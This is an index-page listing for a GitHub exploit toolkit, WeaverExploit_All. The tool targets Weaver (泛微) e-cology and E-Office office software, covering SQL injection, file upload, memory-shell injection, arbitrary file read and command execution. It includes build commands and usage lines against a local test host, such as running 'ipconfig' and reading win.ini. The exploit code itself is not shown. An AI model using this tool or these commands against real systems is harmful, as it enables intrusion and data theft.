Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/zhaoyumi/WeaverExploit_All

泛微最近的漏洞利用工具（PS：2023）
https://github.com/zhaoyumi/WeaverExploit_All

Last synced: 3 months ago
JSON representation

泛微最近的漏洞利用工具（PS：2023）

Host: GitHub
URL: https://github.com/zhaoyumi/WeaverExploit_All
Owner: zhaoyumi
Created: 2023-06-26T03:12:47.000Z (over 1 year ago)
Default Branch: main
Last Pushed: 2023-12-14T09:15:43.000Z (12 months ago)
Last Synced: 2024-07-20T09:00:16.988Z (5 months ago)
Language: Go
Size: 1000 KB
Stars: 439
Watchers: 8
Forks: 41
Open Issues: 7
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - zhaoyumi/WeaverExploit_All - 泛微最近的漏洞利用工具（PS：2023） (Go)

README

# WeaverExploit_All

> 泛微最近的漏洞利用工具（PS：2023）

集成了[QVD-2023-5012](https://www.secrss.com/articles/52198)、[CVE-2023-2523](https://blog.csdn.net/qq_41904294/article/details/130832416)、[CVE-2023-2648](https://blog.csdn.net/qq_41904294/article/details/130832416)、[getloginid_ofsLogin](https://blog.csdn.net/weixin_46944519/article/details/130722085) 漏洞利用

**2023.7.26：新增：WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测**

**2023.8.05：新增泛微E-Office 信息泄露、未授权漏洞**

**2023.8.21：新增泛微E-Office 多个sql注入漏洞、E-cology HrmCareerApplyPerViewSQL注入漏洞**

**2023.12.14：新增：e-cology 任意文件读取、E_Message任意文件读取、E_Office SQL注入、Cology8 SQL注入**

#### 0x001 编译使用

```
go build -o WeaverExloit-All.exe .\main.go
```

#### 0x002 使用方法

默认全部poc

```
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p QVD-2023-5012
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p CVE-2023-2523
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p CVE-2023-2648
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p getloginid_ofsLogin
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p DeleteUserRequestInfoByXml
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p WorkFlowServiceXml
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p UploaderOperate
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p FileDownloadForOutDocSQL
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p E_Mobile_client -c ipconfig
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p EOfficeVUl
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p EOfficeSQL
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p HrmCareerApplyPerViewSQL
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p E_Message
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p Cology8docsSQL
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p E_Office_json_commonSQL
WeaverExloit-All.exe -u http://127.0.0.1:8080/ -p XmlRpcServlet -f c:\\windows\win.ini
```

![image-20231214170624835](img/image-20231214170624835.png)

![image-20231214170755855](img/image-20231214170755855.png)

![image-20230626105738808](img/image-20230626105738808.png)

![image-20230626110039351](img/image-20230626110039351.png)

![image-20230626110207611](img/image-20230626110207611.png)

![image-20230726142128257](img/image-20230726142128257.png)

dnslog 地址放到config/config.txt中

![image-20230726105951498](img/image-20230726105951498.png)

![image-20230807094313215](img/image-20230807094313215.png)

![image-20230821090721048](img/image-20230821090721048.png)

![image-20230821090909509](img/image-20230821090909509.png)

#### 0x003 仅供测试使用

免责声明：本工具不得用于商业用途,仅做学习交流，如用作他途造成的一切后果请自行承担！